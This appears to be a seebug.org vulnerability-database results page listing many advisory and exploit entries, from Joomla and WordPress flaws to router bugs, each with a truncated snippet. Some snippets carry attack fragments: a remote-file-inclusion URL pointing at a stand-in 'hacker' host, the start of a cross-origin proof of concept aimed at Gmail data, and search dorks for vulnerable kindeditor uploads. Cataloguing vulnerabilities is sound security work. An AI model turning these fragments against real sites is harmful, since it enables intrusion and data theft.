Lucene search
K
SeebugMost viewed

56796 matches found

seebug.org
seebug.org
added 2008/12/23 12:0 a.m.58 views

webcamXP URL目录遍历漏洞

BUGTRAQ ID: 32928 webcamXP是一款商业网络摄像头软件,集成了用于共享视频的Web服务器。 webcamXP没有正确地处理URL编码的斜线,远程攻击者可以通过提交恶意URL请求执行目录遍历攻击,读取服务器上的任意文件。 moonware studios webcamXP 5.3.2.410 build 2132 厂商补丁: moonware studios ---------------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.webcamxp.com...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2008/11/07 12:0 a.m.58 views

Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit #2

No description provided by source. Adobe Reader Javascript Printf Buffer Overflow Exploit =========================================================== Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow CVE-2008-2992 Thanks to coresecurity for the technical background...

9.3CVSS6.5AI score0.98482EPSS
Exploits19
seebug.org
seebug.org
added 2008/09/14 12:0 a.m.58 views

Linkarity (link.php) Remote SQL Injection Vulnerability

No description provided by source. ================================================================================ Linkarity link.php Remote SQL Injection Vulnerability ================================================================================ Discovered By: Egypt Coder home :...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/09/11 12:0 a.m.58 views

Apple QuickTime Movie/PICT/QTVR多个远程漏洞

BUGTRAQ ID: 31086 CVE ID:CVE-2008-3615 CVE-2008-3635 CVE-2008-3624 CVE-2008-3625 CVE-2008-3614 CVE-2008-3626 CVE-2008-3627 CVE-2008-3628 CVE-2008-3629 CNCVE ID:CNCVE-20083615 CNCVE-20083635 CNCVE-20083624 CNCVE-20083625 CNCVE-20083614 CNCVE-20083626 CNCVE-20083627 CNCVE-20083628 CNCVE-20083629...

9.3CVSS6.4AI score0.08618EPSS
Exploits2
seebug.org
seebug.org
added 2008/05/05 12:0 a.m.58 views

Linux Kernel dnotify.c文件本地竞争条件漏洞

BUGTRAQ ID: 29003 CVECAN ID: CVE-2008-1375 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel的dnotify子系统在fcntl和close调用之间存在竞争条件,在最后一个描述符已经离开current-files之后可以将dnotifystruct注入到inode的列表中,这可能导致系统崩溃或获得root用户权限。 Linux kernel 2.6.25.1 厂商补丁: Debian ------ Debian已经为此发布了一个安全公告(DSA-1565-1)以及相应补丁: DSA-1565-1:New...

6.9CVSS2.8AI score0.00306EPSS
Exploits1
seebug.org
seebug.org
added 2008/01/22 12:0 a.m.58 views

boastMachine <= 3.1 (mail.php id) SQL Injection Vulnerability

No description provided by source. ...:::::boastMachine =3.1 SQL Injection Vulnerbility ::::.... Virangar Security Team www.virangar.org www.virangar.net -------- Discoverd By :virangar security teamhadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hacke...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/12/21 12:0 a.m.58 views

Adobe Flash Player ActiveX控件通用跨站脚本漏洞

Adobe Flash Player是一款流行的FLASH播放程序。 Adobe Flash Player包含的ActiveX控件处理navigateToURL API存在缺陷,远程攻击者可以利用漏洞进行跨站脚本攻击,可获得敏感信息或进行其他攻击。 navigateToURL API函数接收两个参数,URL和要浏览的帧名,SWF动画可在javascript: URI中传递而帧名可是其他域的帧名,这可导致URI执行在其他帧安全上下文中执行,攻击者可以构建恶意WEB页,诱使用户访问来触发。 RedHat Enterprise Linux Supplementary v.5 server...

4.3CVSS0.2AI score0.12931EPSS
Exploits1
seebug.org
seebug.org
added 2007/11/05 12:0 a.m.58 views

PHP Helpdesk Login SQL注入漏洞

PHP Helpdesk是一款基于PHP的WEB应用程序。 PHP Helpdesk不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞进行SQL注入攻击,可获得敏感信息或未授权访问应用程序。 问题是由于登录脚本对用户提交的参数缺少过滤,提交恶意SQL查询作为参数数据,可绕过验证未授权访问应用程序。 PHP Helpdesk 0.6.16 目前没有详细解决方案提供: http://phphelpdesk.sourceforge.net/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/10/25 12:0 a.m.58 views

Lotus Domino任意访问内存映射文件漏洞

BUGTRAQ ID: 26146 CVECAN ID: CVE-2007-5544 Lotus Domino/Notes服务器是一款基于WEB协同工作的应用程序架构,运行在Linux/Unix和Microsoft Windows操作系统平台下。 Lotus Domino的IPC机制实现上存在漏洞,本地攻击者可能利用此漏洞提升权限。 Lotus Domino的NLNOTES和NTASKLDR间进程间通讯(IPC)机制是通过内存映射的文件执行的,在创建文件时向ACL参数传送了NULL,导致EVERYONE都赋予了完全控制权限。...

6.2CVSS6.4AI score0.0027EPSS
Exploits1
seebug.org
seebug.org
added 2007/10/23 12:0 a.m.58 views

RealPlayer ierpplug.dll ActiveX控件播放列表名称栈溢出漏洞

BUGTRAQ ID: 26130 CVECAN ID: CVE-2007-5601 RealPlayer是一款流行的媒体播放器,支持多种媒体格式。 RealPlayer的MPAMedia.dll库所提供的RealPlayer数据库组件在处理播放列表名时存在栈溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。 由于可使用ierpplug.dll所提供的IERPCtl ActiveX控件将本地文件导入到RealPlayer中指定的播放列表,因此如果用户受骗访问了恶意网页并导入了恶意文件的话,就可以触发这个溢出,导致拒绝服务或执行任意指令。 Real Networks RealPlayer 1...

9.3CVSS6.4AI score0.42365EPSS
Exploits9
seebug.org
seebug.org
added 2007/10/08 12:0 a.m.58 views

Public Media Manager newstopic_inc.php远程文件包含漏洞

Public Media Manager是一款基于PHP的WEB应用程序。 Public Media Manager不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是由于'newstopicinc.php'脚本对用户提交的'indir'参数缺少过滤,指定远程服务器上的任意文件作为包含对象,可导致以以WEB权限执行任意命令。 Public Media Manager Public Media Manager 1.3 目前没有解决方案提供: http://pmm-cms.sourceforge.net/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/06/20 12:0 a.m.58 views

Subversion修改属性远程信息泄露漏洞

Subversion是一款开放源码的多用户版本控制系统,支持非ASCII 文本和二进制数据。 Subversion在处理日志访问时存在漏洞,远程攻击者可能利用此漏洞获取敏感信息。 由于日志消息中可能会包含有关更改的详细信息,因此Subversion为用户访问指定的修改元数据设置了三级权限,分别为“完全访问”、“不可访问”和“部分访问”,其中设置为“部分访问”权限的用户仅可以看到svn:date和svn:author修改属性,以及changed-paths信息的路径(但不是信息)。 如果读者可以访问修改中所变更的所有路径,但不可以访问修改中所拷贝的所有路径,且使用svn propget、s...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/06/14 12:0 a.m.58 views

Microsoft IE语言包安装远程代码执行漏洞(MS07-033)

Internet Explorer是一款非常流行的WEB浏览器。 用于负责按需安装Internet Explorer语言包的例程存在竞争条件错误,成功利用此漏洞的攻击者可以完全控制受影响的系统。 如果网页所包含的一些内容是由所安装语言包不支持的语言编写的话,则用户访问了该网页就可以触发这个漏洞,导致内存破坏。攻击者可以通过构建特制的网页来利用该漏洞,当用户查看网页时,该漏洞可能允许远程执行代码。 Microsoft Internet Explorer 7.0 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/06/07 12:0 a.m.58 views

Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit

No description provided by source. / El error, bastante tonto por cierto, se encuentra en la función wpsuggestCategories, en el archivo xmlrpc.php: function wpsuggestCategories$args global $wpdb; $this-escape$args; $blogid = int $args0; $username = $args1; $password = $args2; $category = $args3; ...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/05/08 12:0 a.m.58 views

Linux Kernel RTA_MAX越界访问漏洞

Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel代码实现上存在漏洞,本地攻击可能利用此漏洞对系统造成拒绝服务。 Linux内核代码中存在一个错误,将RTAMAX而不是RTNMAX错误地用做了数组的大小,导致dnfibprops(dnfib.c,DECNet)和fibprops(fibsemantics.c,IPv4)函数中可能出现越界访问的情况,造成内核崩溃。 Linux kernel 2.6.21-rc6 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2007/04/25 12:0 a.m.58 views

Joomla! PCLTar.PHP远程文件包含漏洞

Joomla!是一款基于PHP的WEB应用程序。 Joomla!不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'PCLTar.PHP'脚本对用户提交的'gpcltarlibdir'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 Joomla 1.5.0 Beta 目前没有解决方案提供: http://www.joomla.org/ http://www.example.com/libraries/pcl/pcltar.php?gpcltarlibdir=http://hacker/?...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/04/07 12:0 a.m.58 views

HP Mercury Quality Center Spider90.ocx ProgColor Overflow Exploit

No description provided by source. !/usr/bin/perl POC exploit for Mercury Quality Center Spider90.ocx ProgColor Overflow credit to Skylined, Trirat Puttaraksa, HDM Skape and the rest of the metasploit crew. This exploit is just a cut and paste of thier code they deserve the credit Vulnerability...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/20 12:0 a.m.58 views

Oracle <= 9i / 10g (extproc) Local/Remote Command Execution Exploit

No description provided by source. -- -- $Id: raptororaextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $ -- -- raptororaextproc.sql - command exec via oracle extproc -- Copyright c 2006 Marco Ivaldi [email protected] -- -- Directory traversal vulnerability in extproc in Oracle 9i and 10g --...

8.5CVSS0.1AI score0.13782EPSS
Exploits9
seebug.org
seebug.org
added 2006/12/13 12:0 a.m.58 views

Sophos Anti-Virus SIT文档解析栈溢出漏洞

Sophos Anti-Virus是一款适用于多种操作系统的杀毒软件。 Sophos AntiVirus在解析SIT文档时存在栈溢出漏洞,远程攻击者可能利用此漏洞在扫描机器上执行指令。 CPIO文档中的超长非NULL字符结尾的文件名串会导致veex.dll发生栈溢出。 Sophos Anti-Virus http://www.sophos.com/support/knowledgebase/article/21637.html...

7AI score
Exploits0
seebug.org
seebug.org
added 2006/12/10 12:0 a.m.58 views

Anti-Spam SMTP Proxy Server未授权文件访问漏洞

Anti-Spam SMTP Proxy Server是一款反垃圾邮件SMTP代理服务器。 Anti-Spam SMTP Proxy Server不正确限制用户的访问,远程攻击者可以利用漏洞访问系统上文件获得敏感信息。 John Hanna Anti-Spam SMTP Proxy ASSP Server 1.2.3 http://assp.sourceforge.net/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/06 12:0 a.m.58 views

Mambatstaff MosConfig_Absolute_Path远程文件包含漏洞

Mambatstaff是一款基于Mambo的应用模块程序。 Mambatstaff不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'mambatstaff.php'脚本对用户提交的"mosConfigabsolutepath"参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 Mambo Mambatstaff Component http://mamboxchange.com/projects/mambatstaff/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/11/29 12:0 a.m.58 views

3CTftpSvc TFTP传送模式远程缓冲区溢出漏洞

3CTftpSvc TFTP是一款tftp服务程序。 3CTftpSvc TFTP不正确处理超长传送模式,远程攻击者可以利用漏洞进行缓冲区溢出攻击,可能以进程权限执行任意指令。 当处理超长传送模式超过470字节传递给"GET"或"PUT"命令,可导致发生缓冲区溢出,精心构建提交数据,可能以进程权限执行任意指令。 3CTftpSvc TFTP Server 2.0.1 http://support.3com.com/software/utilitiesforwindows32bit.htm !/usr/bin/python Buffer Overflow Long transporting...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/04/23 12:0 a.m.58 views

Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability

No description provided by source. NukedX Security Advisory Nr 2006-29 ClanSys v1.1 index.php page PHP Code Insertion Vulnerability Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory: http://www.nukedx.com/?viewdoc=29...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2018/06/22 12:0 a.m.57 views

Insteon Hub Reboot Task Denial Of Service Vulnerability(CVE-2017-16348)

Summary An exploitable denial of service vulnerability exists in Insteon Hub running firmware version 1012. Leftover demo functionality allows for arbitrarily rebooting the device without authentication. An attacker can send an UDP packet to trigger this vulnerability. Tested Versions Insteon Hub...

0.2AI score0.01731EPSS
Exploits2
seebug.org
seebug.org
added 2018/05/29 12:0 a.m.57 views

TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass

Title: TP-Link Multiple RouterTL-WR840N and TL-WR841N Unauthenticated Router Access Vulnerability Author: BlackFog Team Date: 27 May 2018 Website: SecureLayer7.net Contact: [email protected] Version: 0.9.1 4.16 v0001.0 Build 170622 Rel.64334n Hardware: TL-WR841N v13 00000013 Version : Firmwar...

0.2AI score
Exploits0
seebug.org
seebug.org
added 2017/12/29 12:0 a.m.57 views

Dell SonicWALL Secure Mobile Access SMA 8.1 XSS And WAF CSRF

Summary Keep up with the demands of today’s remote workforce. Enable secure mobile access to critical apps and data without compromising security. Choose from a variety of scalable secure mobile access SMA appliances and intuitive Mobile Connect apps to fit every size business and budget...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2017/12/29 12:0 a.m.57 views

InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution

Summary InfraPower Manager PPS-02-S is a FREE built-in GUI of each IP dongle IPD-02-S only to remotely monitor the connected PDUs. Patented IP Dongle provides IP remote access to the PDUs by a true network IP address chain. Only 1xIP dongle allows access to max. 16 PDUs in daisy chain - which is ...

8.5AI score
Exploits0
seebug.org
seebug.org
added 2017/12/26 12:0 a.m.57 views

Asus_GlobalWirteOverflow

Vulnerability: Global buffer overflow in networkmap ------------------------------------------ Exploitation: Can write data at any address in heap ------------------------------------------ Vendor of Product: Asus wireless router ------------------------------------------ Affected Products and...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2017/12/15 12:0 a.m.57 views

MacOS/iOS kernel double free due to incorrect API usage in flow divert socket option handling(CVE-2017-13867)

SOFLOWDIVERTTOKEN is a socket option on the SOLSOCKETlayer. It's implemented by flowdiverttokensetstruct socket so, struct sockopt sopt in flowdivert.c. The relevant code is: error = sooptgetmsopt, &token; if error goto done; error = sooptmcopyinsopt, token; if error goto done; ... done: if token...

8AI score0.05109EPSS
Exploits2
seebug.org
seebug.org
added 2017/12/04 12:0 a.m.57 views

Microsoft Edge: Chakra: JIT: Inline::InlineCallApplyTarget_Shared doesn't return the return instruction(CVE-2017-11841)

Here's a snippet of Inline::Optimize. FOREACHINSTREDITINGinstr, instrNext, func-mheadInstr switch instr-mopcode case Js::OpCode::Label: ... if instr-AsLabelInstr-misForInExit Assertthis-currentForInDepth != 0; // The PoC hits this this-currentForInDepth--; break; case...

7.6CVSS7.4AI score0.59642EPSS
Exploits3
seebug.org
seebug.org
added 2017/11/29 12:0 a.m.57 views

ZTE ZXDSL Configuration Reset

Vulnerability Summary The following advisory describes a configuration reset vulnerability found in ZTE ZXDSL 831CII version 6.2. ZXDSL 831CII is “an ADSL access device to support multiple line modes. It supports ADSL2/ADSL2+ and is backward compatible to ADSL, even offers auto-negotiation...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2017/11/22 12:0 a.m.57 views

DblTek Multiple Vulnerabilities

Vulnerabilities summary The following advisory describes 2 two vulnerabilities found in DblTek webserver. DBL is “specialized in VoIP products, especially GoIPs. We design, develop, manufacture, and sell our products directly and via distributors to customers. Our GoIP models now cover 1, 4, 8, 1...

7.9AI score
Exploits0
seebug.org
seebug.org
added 2017/10/17 12:0 a.m.57 views

Apple OS X Scene Kit DAE XML Code Execution Vulnerability(CVE-2016-1850)

SUMMARY An exploitable type confusion vulnerability exists in the handling of DAE images on OS X. A crafted DAE document can trigger a type confusion vulnerability which potentially could be exploited to achieve attacker controlled code execution. Vulnerability can be triggered via a saved DAE fi...

6.8CVSS8.6AI score0.0221EPSS
Exploits1
seebug.org
seebug.org
added 2017/10/09 12:0 a.m.57 views

safari10跨域漏洞

safari 10的XMLHttpRequest在null域下可以随意发起跨域请求和设置httpheader 我交到苹果的bugreport,并给apple发邮件后,他们自己悄悄把漏洞修了,连个邮件都没给我发,所以我决定公开poc 这是我在漏洞未修复前截的图: 这个漏洞可以造成同源策略绕过,随便跨域,这是我写的获取gmail数据的代码: html var serveraddress = 'http://127.0.0.1:8000/static/csrfWcn6h/' function deleteSelf let test = document.getElementById'test'...

7AI score
Exploits0
seebug.org
seebug.org
added 2017/09/26 12:0 a.m.57 views

Aerospike Database Server Index Name Code Execution Vulnerability(CVE-2016-9052)

Summary An exploitable stack-based buffer overflow vulnerability exists in the querying functionality of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause a stack-based buffer overflow in the function assindexsimatchbyiname resulting in remote code execution. An attacker ca...

7.5CVSS9.9AI score0.077EPSS
Exploits2
seebug.org
seebug.org
added 2017/08/22 12:0 a.m.57 views

SQL Injection(CVE-2017-12650) and CSRF(CVE-2017-12651) Security Vulnerability in Loginizer

As part of a vulnerability research project for our WordPress Security Scanner at WPcans.com, we have been auditing popular WordPress plugins looking for security issues. While auditing the WordPress plugin Loginizer, we discovered a SQL Injection vulnerability and a Cross-Site Request Forgery...

7.5CVSS10.2AI score0.01843EPSS
Exploits1
seebug.org
seebug.org
added 2017/07/04 12:0 a.m.57 views

Foscam IP Video Camera Command Injection Vulnerability(CVE-2017-2847)

Summary An exploitable command injection vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can allow for a user to inject arbitrary shell characters during manual network configurati...

6.5CVSS9.6AI score0.04527EPSS
Exploits2
seebug.org
seebug.org
added 2017/06/27 12:0 a.m.57 views

Windows Kernel stack memory disclosure in win32k!NtGdiMakeFontDir(CVE-2017-8477)

We have discovered that the win32k!NtGdiMakeFontDir system call discloses large portions of uninitialized kernel stack memory to user-mode clients. The attached proof of concept code which is specific to Windows 7 32-bit works by first filling a large portion of the kernel stack with a controlled...

1.9CVSS7.3AI score0.0511EPSS
Exploits2
seebug.org
seebug.org
added 2017/06/27 12:0 a.m.57 views

Windows Kernel stack memory disclosure in win32k!ClientPrinterThunk(CVE-2017-8475)

We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 other platforms untested indirectly through the win32k!NtGdiOpenDCW system call. The analysis shown below was performed on Windows 7 32-bit. The full stack trace...

1.9CVSS7.4AI score0.03727EPSS
Exploits1
seebug.org
seebug.org
added 2017/05/22 12:0 a.m.57 views

PlaySMs 1.4 'import.php' Remote Code Execution

Description Code Execution using import.php We know import.php accept file and just read content not stored in server. But when we stored payload in our backdoor.csv and upload to phonebook. Its execute our payload and show on next page in field in NAME,MOBILE,Email,Group COde,Tags accordingly . ...

7.7AI score
Exploits0
seebug.org
seebug.org
added 2017/05/02 12:0 a.m.57 views

Heap Overflow Vulnerability in Citrix NetScaler Gateway (CVE-2017-7219)

After presenting my findings on the Swisscom router at the CybSecConference last year, I started looking for a new product to analyze. I quickly found that it’s possible to download virtual “demo” appliances of Citrix products, so I went on to download a Netscaler VPX, which at the time was at...

9CVSS9.7AI score0.04856EPSS
Exploits2
seebug.org
seebug.org
added 2017/04/28 12:0 a.m.57 views

Zabbix Proxy Server SQL Database Write Vulnerability (CVE-2017-2825)

Official patch earlier to fix the vulnerabilities: the Zabbix code execution vulnerability DETAILS One of the Trapper requests made by the Zabbix proxy is the ìproxy configî request, which allows a proxy to request its own proxy configuration from the Zabbix Server or any other Zabbix Proxyís...

7.8AI score0.04385EPSS
Exploits2
seebug.org
seebug.org
added 2016/12/23 12:0 a.m.57 views

Ubuntu Apport < 2.20.4 Code Execution on Ubuntu Desktop(CVE-2016-9949)

This research was inspired by Chris Evan’s great work on exploiting client-side file format parsing bugs in the gstreamer media library on Ubuntu. We will look for other default file handlers on Ubuntu which may be vulnerable to exploitation. I’m not a binary exploitation guru like Chris so inste...

9.3CVSS8.8AI score0.17726EPSS
Exploits8
seebug.org
seebug.org
added 2016/10/08 12:0 a.m.57 views

Wordpress <= 4.6.1 Stored XSS Via Theme File

Author: p0wd3r 知道创宇404安全实验室 0x00 漏洞概述 1.漏洞简介 WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统,近日研究者发现在其 ... DO NOT CHANGES HERE ... / 接着更改文件夹名字再打包: bash mv illdy "" zip -r theme.zip "" 构造好之后我们登录后台上传该主题文件,同时开始动态调试。 首先进入wp-admin/includes/class-theme-installer-skin.php中第55-82行: php $name =...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/03/19 12:0 a.m.57 views

E-TILLER期刊采编系统/ch/reader/wait_published_articles.aspx等8处 POST注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/03/17 12:0 a.m.57 views

正方教务系统 jwggck.aspx 参数fbsj SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/03/14 12:0 a.m.57 views

cacti气象图插件任意文件上传漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/03/13 12:0 a.m.57 views

MetInfo 5.1.7 about/index.php 任意文件包含漏洞可getshell

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/18 12:0 a.m.57 views

jeecms前台在/member/o_upload_image.jspx存在文件上传漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/09/25 12:0 a.m.57 views

kindeditor<=4.1.5文件上传漏洞

漏洞描述漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net漏洞存在于小于等于kindeditor4.1.5编辑器中关键字: allinurl:/examples/uploadbutton.html allinurl:/php/uploadjson.php / .asp /...

7.1AI score
Exploits0
Total number of security vulnerabilities5000